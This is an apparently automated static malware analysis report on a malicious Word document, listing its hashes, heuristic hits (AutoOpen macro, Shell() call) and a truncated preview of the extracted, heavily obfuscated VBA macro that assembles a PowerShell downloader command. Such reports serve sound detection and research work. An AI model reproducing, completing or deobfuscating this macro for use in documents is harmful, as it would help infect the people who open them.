Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 165342352beed895…

MALICIOUS

Office (OLE)

156.0 KB Created: 2018-05-20 21:45:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 58170d63094a91f3b8ff8d5812f9050f SHA-1: 9dffb6e197829bffe7d7447fa344f63fad49e5d8 SHA-256: 165342352beed89530e07fab934f28102731a4139ce15e63a39f7b2521723a76
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The critical heuristic firing for a Shell() call within the VBA, combined with the script's attempt to construct and execute a PowerShell command, strongly suggests a downloader or initial execution payload. The obfuscated nature of the script prevents a more precise determination of its ultimate goal.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 189234 bytes
SHA-256: f2c8649f950a54309d809be43b0001618e22b6fd51802a07a76314f08ca928f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HPfiIqCZCzE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BiaZiUSTfbG()

On Error Resume Next
TjaXAFJScCO = (buuTYhNRjGq - CDbl(275438) + WAsTihMYIK + Fix(YriNONHvG / CLng(387668 * Sqr(JzmTWNYuBMN))) - 425551 / Sin(kBzNpnvqqp - KWbpUwE - 498046 + CLng(KkuMDFAH)) * 474213 * Fix(275438))
bvFFFjiwVi = "UbCpiVBE7Dyowershell  (('Oa0zAJX7QkjtuVmYxSCkK8(HiogLC"
jtlZtRvtR = CStr(Left(Right(bvFFFjiwVi, 43), 14)) + CStr(Left(Right(bvFFFjiwVi, 7), 1)) + Left(Right(bvFFFjiwVi, 46), 2) + CStr(Left(Right(bvFFFjiwVi, 47), 1))

kjhIBGlRo = "7hQaLnsaYcEBvogd7gTCtIT1L4F'UDICk"
TvqRNIRwZvL = CStr(Left(Right(kjhIBGlRo, 31), 6)) + Left(Right(kjhIBGlRo, 18), 2) + CStr(Left(Right(kjhIBGlRo, 4), 1)) + CStr(Left(Right(kjhIBGlRo, 23), 1)) + Left(Right(kjhIBGlRo, 6), 1)

UHJaFoOmoju = Chr(43)
Sstvzw = "'Y8"
tfTwRkWtkz = CStr(Left(Right(Sstvzw, 3), 1))
KkBEYioVj = (ZSNWFVGcuL - CDbl(560944) + rYGOHG + Fix(jwZQNFnRmP / CLng(889142 * Sqr(MNDQV))) - 43562 / Sin(FYBYuL - LURSLupQb - 481550 + CLng(phQIE)) * 948300 * Fix(560944))
nnnmBYck = Chr(43)
sKQStT = "vgN7DEasd = grR7TCtIT1&(FUUDICkw1EpLPUSDPCzKBQrG"
kEUjSX = CStr(Left(Right(sKQStT, 45), 9)) + CStr(Left(Right(sKQStT, 26), 2)) + CStr(Left(Right(sKQStT, 6), 1)) + Left(Right(sKQStT, 34), 2) + CStr(Left(Right(sKQStT, 9), 1)) + CStr(Left(Right(sKQStT, 15), 1))

jEQEwnUco = Chr(43)
amkCmL = "Q7DE7nNE7OY7mBvogr0gTDtI"
VtdZjKkd = Left(Right(amkCmL, 23), 5) + Left(Right(amkCmL, 13), 1) + Left(Right(amkCmL, 3), 1) + Left(Right(amkCmL, 17), 1)
bzSKzaCjHh = (tjFPN - CDbl(274567) + RkmGDKt + Fix(ztQCdCHwv / CLng(382293 * Sqr(DqEQt))) - 574199 / Sin(OmvXBFap - iFoZiYpZ - 960787 + CLng(wjljdfwu)) * 888394 * Fix(274567))
jiRwnnzTVL = Chr(43)
HYDfIpw = "Q7DEzgEu77YcmBvogrDgT"
EQrXNEEk = Left(Right(HYDfIpw, 20), 4) + CStr(Left(Right(HYDfIpw, 12), 1)) + Left(Right(HYDfIpw, 3), 1) + Left(Right(HYDfIpw, 15), 1)

SpjspYksT = Chr(43)
jmNLnjCl = "7DEKQq'hvgNu"
OwjCv = Left(Right(jmNLnjCl, 12), 3) + Left(Right(jmNLnjCl, 6), 1)
tuYGPDGA = (zcVNwC - CDbl(714926) + sTwMZ + Fix(BdndXMVS / CLng(768947 * Sqr(JhfCak))) - 368832 / Sin(WkNsA - nhhQdtvmq - 865153 + CLng(wTtvTljtiv)) * 301862 * Fix(714926))
UqziScWEov = Chr(43)
UTRooJzKiDC = "H'R77hvDNu7OYEm"
MBYcK = Left(Right(UTRooJzKiDC, 14), 3) + CStr(Left(Right(UTRooJzKiDC, 8), 1)) + CStr(Left(Right(UTRooJzKiDC, 2), 1))

GTrOQ = Chr(43)
ZXobs = "7DEKQq7hvgNu"
wUCqiPVoKFI = Left(Right(ZXobs, 12), 3) + Left(Right(ZXobs, 6), 1)

PwcItovkKj = Chr(43)
COPvK = "7hzR7ezODcmBRogr0gTCtIE7L4F"
rQwmDjqBYE = Left(Right(COPvK, 25), 5) + Left(Right(COPvK, 15), 1) + Left(Right(COPvK, 4), 1) + Left(Right(COPvK, 19), 1) + Left(Right(COPvK, 5), 1)
BiaZiUSTfbG = jtlZtRvtR + TvqRNIRwZvL + UHJaFoOmoju + tfTwRkWtkz + nnnmBYck + kEUjSX + jEQEwnUco + VtdZjKkd + jiRwnnzTVL + EQrXNEEk + SpjspYksT + OwjCv + UqziScWEov + MBYcK + GTrOQ + wUCqiPVoKFI + PwcItovkKj + rQwmDjqBYE

End Function

Function wKPmnoSGpG()

On Error Resume Next
knYzS = (HAHRDujzklY - CDbl(574423) + iRzFYCjj + Fix(MELBw / CLng(953564 * Sqr(CHtoQLE))) - 492814 / Sin(DLNkUtM - zErZCGiOWN - 70674 + CLng(ovvvQFYjrq)) * 364235 * Fix(574423))
dTAXnczPjmR = Chr(43)
znDiRMSwC = "7DEKQq7hvgNu"
uoKlnvYDszm = Left(Right(znDiRMSwC, 12), 3) + Left(Right(znDiRMSwC, 6), 1)

QuAcmEDsbmw = Chr(43)
PVKiRzUIf = "HzR77hvDNu7OYEm"
HRiCa = Left(Right(PVKiRzUIf, 14), 3) + CStr(Left(Right(PVKiRzUIf, 8), 1)) + CStr(Left(Right(PVKiRzUIf, 2), 1))

RvLjJB = Chr(43)
zIJhYqFEVd = "Q7DE7gEu77YcmBvogrDgT"
jwVbJCjhAG = Left(Right(zIJhYqFEVd, 20), 4) + CStr(Left(Right(zIJhYqFEVd, 12), 1)) + Left(Right(zIJhYqFEVd, 3), 1) + Left(Right(zIJhYqFEVd, 15), 1)

cVdfiZRHqEi = Chr(43)
zXbVlOpaV = "vgN7DEw-objog70gTCtec1L4FUUDECkw1DpLPzS2PC"
RWchfrn = CStr(Left(Right(zXbVlOpaV, 39), 8)) + Left(Right(zXbVlOpaV, 23), 2) + Left(Right(zXbVlOpaV, 5), 1) + Left(Right(zXbVlOpaV, 29), 1) + CStr(
... (truncated)